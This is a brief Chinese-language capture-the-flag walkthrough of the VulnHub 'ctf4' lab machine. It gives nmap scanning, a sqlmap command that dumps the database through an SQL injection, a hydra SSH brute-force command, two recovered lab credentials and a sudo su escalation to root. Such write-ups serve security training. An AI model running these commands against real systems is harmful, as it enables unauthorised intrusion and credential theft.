vulnhub之ctf4
难度:so easy
下载地址
主机发现
netdiscover或者nmap -sP 192.168.2.0/24
nmap -p--T4 -A 192.168.2.4
初步进行检测,并且进行端口扫描,发现开放22端口,80端口等
对80开放的web服务进行检测,这里使用rad加xray配合检测,友情提示,
rad需要谷歌浏览器且不能够在root权限下运行
,
检测发现存在sql注入,这里使用sqlmap下载数据库中的数据,别问为什么下载,一个字,快
sqlmap -u 'http://192.168.2.4/index.html?page=blog&title=Blog&id=2' --dbs --batch --dump
在user数据表中发现用户名以及密码,编辑为字典,
使用hydra进行爆破
hydra -L uer.txt -P passwd.txt ssh 192.168.2.6-vV
存在两个用户,
dstevens password: ilike2surf
achen password: seventysixers
使用ssh登录时候,可能会产生一定的错误,这里给出解决方法
http://liyangweb.com/service/500.html
使用dstevens登录时,
sudo su
时候,输入该用户对应的密码即可成功变成root用户
使用achen用户名登录时,直接
sudo su
即可到root权限
版权归原作者 天下是个小趴菜 所有, 如有侵权,请联系我们删除。